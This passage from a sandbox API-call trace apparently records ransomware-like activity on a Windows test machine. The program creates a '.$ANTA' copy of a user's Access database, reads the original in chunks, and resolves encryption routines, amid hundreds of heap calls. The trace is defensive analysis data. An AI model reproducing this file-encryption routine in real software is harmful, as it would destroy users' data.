lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0076.221] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0076.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0076.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0076.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0076.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0076.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0076.222] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0076.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0076.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0076.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0076.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0076.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0076.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.223] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0076.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0076.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0076.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0076.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0076.223] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0076.223] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0076.223] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0076.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0076.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0076.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0076.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0076.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0076.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0076.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0076.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0076.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0076.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0076.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e01020 [0076.227] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0076.227] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0076.251] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0076.254] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0076.257] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0076.260] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0076.262] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x5000, lpOverlapped=0x0) returned 1 [0076.262] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0076.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0076.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x55000) returned 0x440b3b8 [0076.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e01020 | out: hHeap=0x1780000) returned 1 [0076.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0076.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0076.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0076.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0076.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x55000) returned 0x44603c0 [0076.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x440b3b8 | out: hHeap=0x1780000) returned 1 [0076.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.290] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0076.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0076.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0076.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0076.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x55000) returned 0x440b3b8 [0076.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x440b3b8 | out: hHeap=0x1780000) returned 1 [0076.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0076.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0076.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.291] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0076.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0076.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0076.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0076.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0076.291] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0076.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0076.291] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0076.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0076.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0076.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0076.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0076.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0076.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0076.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x55000) returned 0x440b3b8 [0076.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0076.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0076.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0076.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0076.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0076.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0076.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0076.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0076.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0076.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1c0 [0076.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0076.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0076.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0076.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0076.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0076.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x55000) returned 0x44b53c8 [0076.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0076.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0076.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0076.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0076.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0076.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0076.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0076.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0076.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0076.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0076.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0076.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0076.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0076.307] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0076.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0076.307] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0076.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0076.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0076.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0076.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0076.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0076.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0076.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0076.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0076.307] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0076.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0076.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0076.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0076.308] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0076.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d88 [0076.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.309] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0076.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0076.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0076.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0076.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0076.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0076.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0076.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0076.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0076.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.310] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0076.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0076.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0076.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0076.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0076.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0076.310] 